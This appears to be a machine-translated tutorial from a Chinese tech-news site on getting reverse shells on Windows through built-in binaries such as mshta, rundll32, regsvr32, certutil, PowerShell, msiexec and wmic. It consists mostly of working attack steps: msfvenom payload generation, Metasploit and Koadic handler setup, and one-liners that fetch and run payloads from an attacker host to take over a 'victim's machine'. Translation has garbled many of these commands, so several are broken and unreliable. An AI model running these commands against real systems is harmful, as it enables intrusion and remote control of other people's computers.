Shulou(Shulou.com)06/02 Report--

How to use Windows one-liner to get reverse Shell, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain in detail for you, people with this need can come to learn, I hope you can get something.

Today we will discuss "Windows One-Liner", even if you use malicious commands such as PowerShell or rundll32 to get the reverse shell of the Windows system. Usually, we get RCE vulnerabilities when we abuse HTTP services or other programs. This vulnerability will allow you to execute arbitrary system commands remotely. Therefore, we have prepared a list of Windows commands that allow you to use the target machine to get the reverse connection.

Mshta.exe

Mshta.exe is a Microsoft Windows operating system related program, English full name Microsoft HTML Application, can be translated into Microsoft hypertext markup language application, used to execute .HTA files. We can run the HTML file for JavaScript or VBScript. You can use the Microsoft MSHTA.exe tool to parse these files.

Metasploit contains a "HTA Web Server" module that generates malicious hta files. This module hosts the HTML application (HTA), which, when opened, runs payload through Powershell. When the user navigates to the HTA file, IE prompts twice before executing payload.

Use exploit/windows/misc/hta_servermsf exploit (windows/misc/hta_server) > set srvhost 192.168.1.109msf exploit (windows/misc/hta_server) > set lhost 192.168.1.109msf exploit (windows/misc/hta_server) > exploit

Now, let's run malicious code through mshta.exe (vulnerable to RCE) on the victim's machine to obtain a meterpreter session.

Once you successfully execute a malicious hta file on a remote machine, you will get a reverse connection on your local computer (Kali Linux).

Mshta.exe / / 192.168.1.109:8080/5EEiDSd70ET0k.hta

As shown below, we successfully obtained the meterpreter session of the victim's machine:

Rundll32.exe

Rundll32.exe is associated with the Windows system and allows you to call functions (16-bit or 32-bit) exported from DLL and store them in the appropriate memory library.

Launch a Rundll32 attack through Metasploit's SMB Delivery

Metasploit also includes a "SMB Delivery" module that generates malicious dll files. The module provides payload through the SMB server and provides commands to retrieve and execute the generated payload. DLL and Powershell are currently supported.

Use exploit/windows/smb/smb_deliverymsf exploit (windows/smb/smb_delivery) > set srvhost 192.168.1.109msf exploit (windows/smb/smb_delivery) > exploit

Now, let's run malicious code (vulnerable to RCE attacks) through rundll32.exe on the victim machine to obtain meterpreter sessions.

Once you have successfully executed the dll file on the remote machine, you will get a reverse connection on the local computer (Kali Linux).

Rundll32.exe\\ 192.168.1.109\ vabFG\ test.dll,0

As shown below, we successfully obtained the meterpreter session of the victim's machine:

Regsvr32.exe

The Regsvr32 command, which is used to register COM components, is a command provided by the Windows system to register or uninstall controls with the system, such as DLL and ActiveX controls in the Windows registry. Regsvr32.exe is installed in the% systemroot%\ System32 folder of Windows XP and later Windows.

RegSvr32.exe has the following command line options:

Syntax: Regsvr32 [/ s] [/ u] [/ n] [/ i [: cmdline]]

/ u-Unregister the server

/ I-call DllInstall to pass an optional [cmdline]; when it is used with / u, it calls dll to uninstall

/ n-do not call DllRegisterServer; this option must be used with / I

/ s-Silent; message box is not displayed

Start Regsvr32 through Metasploit's Script Web Delivery

This module will quickly start a Web server that serves payload and provide commands for download and execution. It will bypass the application whitelist through the specified scripting language interpreter or "squiblydoo" via regsvr32.exe. The main purpose of this module is to quickly establish a session on the target computer when an attacker must type commands manually: for example, command injection.

Regsvr32 uses "squiblydoo" technology to bypass the application whitelist. The signed Microsoft binary Regsvr32 can request a .sct file and then execute the included PowerShell command in it. Both Web requests (that is, .sct files and PowerShell download / execute) can occur on the same port. "PSH (Binary)" writes the file to disk, allowing custom binaries to be downloaded / executed.

Use exploit/multi/script/web_deliverymsf exploit (web_delivery) > set target 3msf exploit (web_delivery) > set payload windows/meterpreter/reverse_tcpmsf exploit (web_delivery) > set lhost 192.168.1.109msf exploit (web_delivery) > set srvhost 192.168.1.109msf exploit (web_delivery) > exploit

Copy the text in the following box

Once you have successfully executed the scrobj.dll file on the remote machine, you will get a reverse connection on the local computer (Kali Linux).

Regsvr32 / s / n / u / i://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll

As shown below, we successfully obtained the meterpreter session of the victim's machine:

Certutil.exe

Certutil.exe is a command line program that is installed as part of Certificate Services. We can use it to execute our malicious exe file on the target computer to get the meterpreter session.

Launch a certutil attack through Msfvenom

Use msfvenom to generate a malicious executable (.exe) file and start multi/handler to get the reverse shell of the victim's computer.

Msfvenom-p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234-f exe > shell.exe

Now, use certutil to dump the configuration information or shell.exe file. You can follow the following syntax:

Syntax: [- f] [- urlcache] [- split] Path of executable filecertutil.exe-urlcache-split-f / / 192.168.1.109/shell.exe shell.exe & shell.exe

Use exploit/multi/handler

Msf exploit (multi/handler) > set payload windows/meterpreter/reverse_tcp

Msf exploit (multi/handler) > set lhost 192.168.1.109

Msf exploit (multi/handler) > set lport 1234

Msf exploit (multi/handler) > exploit

As shown below, we successfully obtained the meterpreter session of the victim's machine:

Powershell.exe

You can use PowerShell.exe, or start a PowerShell session from another tool (such as Cmd.exe), or use it from the PowerShell command line to start a new session. For more information, you can read the official website of Microsoft windows.

Launch a Powercat attack through Powershell

Powercat is a modified version of PowerShell native backdoor listener and reverse shell, called netcat, because it integrates payload coding, which msfvenom does, and there is a client-to-client relay that allows you to connect two separate listeners.

Download PowerShell on the local computer, then use python HTTP server to transfer powercat.ps1 to get the reverse shell of the target machine, and start the netcat listener.

Git clone / / github.com/besimorhino/powercat.gitpython-m SimpleHTTPServer 80

Then, execute the following command on the remote side to get the netcat session.

Powershell-c "IEX (New-Object System.Net.WebClient) .DownloadString ('/ / 192.168.1.109 / powercat.ps1'); powercat-c 192.168.1.109-p 1234-e cmd"

As shown below, we obtained the netcat session of the victim's machine:

Batch File

Again, PowerShell allows clients to execute bat files, so let's use msfvenom to generate malicious batch files and start the netcat listener. As follows:

Msfvenom-p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat

Then, execute the following command on the remote side to get the netcat session.

Powershell-c "IEX ((New-Object System.Net.WebClient) .DownloadString ('/ / 192.168.1.109and1.bat'))

As shown below, we obtained the netcat session of the victim's machine:

Cscript

Similarly, PowerShell allows the client to execute cscript.exe to run wsf,js and vbscript, so let's use msfvenom to generate a malicious bat file and start multi/handler as a listener. As follows:

Msfvenom-p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=1234-f vbs > 1.vbs

Then, execute the following command on the remote side to get the meterpreter session.

Powershell.exe-c "(New-Object System.NET.WebClient) .DownloadFile ('/ / 192.168.1.109 + 1.vbswords,\" $env:temp\ test.vbs\ "); Start-Process% windir%\ system32\ cscript.exe\" $env:temp\ test.vbs\ "

Use exploit/multi/handlermsf exploit (multi/handler) > set payload windows/meterpreter/reverse_tcpmsf exploit (multi/handler) > set lhost 192.168.1.109msf exploit (multi/handler) > set lport 1234msf exploit (multi/handler) > exploit

As shown below, we successfully obtained the meterpreter session of the victim's machine:

Msiexec.exe

We know that the Windows operating system has the Windows Installer engine installed, which MSI Package uses to install applications. The executable program for interpreting packages and installing products is Msiexec.exe.

Launch a msiexec attack through msfvenom

Let's use Windows Meterpreter payload to generate a MSI Package file (1.msi) and start multi/handler as a listener. As follows:

Msfvenom-p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234-f msi > 1.msi

Once you have successfully executed the 1.msi file on the remote machine, you will get a reverse connection on the local computer (Kali Linux).

Msiexec / q / i / / 192.168.1.109/1.msi

Use exploit/multi/handlermsf exploit (multi/handler) > set payload windows/meterpreter/reverse_tcpmsf exploit (multi/handler) > set lhost 192.168.1.109msf exploit (multi/handler) > set lport 1234msf exploit (multi/handler) > exploit

As shown below, we successfully obtained the meterpreter session of the victim's machine:

Wmic.exe

Wmic.exe is the WMI command line, and the WMI command line tool (wmic.exe) released as part of Windows XP provides a command line interface to the WMI infrastructure. You can use wmic.exe to perform common WMI tasks from the command line, including browsing CIM and checking CIM class definitions.

Launch a Wmic.exe attack through Koadic

Now, with the help of koadic, a malicious XSL file will be generated, which is a command and control tool, very similar to Metasploit and Powershell Empire. For more information, please refer to https://www.hackingarticles.in/koadic-com-command-control-framework/

After the installation is complete, you can run the. / koadic file to start koadic and load stager/js/wmic stager. Run the following command and set up SRVHOST, where stager should call home.

Use stager/js/wmicset SRVHOST 192.168.1.107run

Execute the following command from WMIC to download and run the malicious XSL file from the remote server:

Wmic os get / FORMAT: "/ / 192.168.1.107:9996/g8gkv.xsl"

Once the malicious XSL file is successfully executed on the target machine, a Zombie connection will be obtained.

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.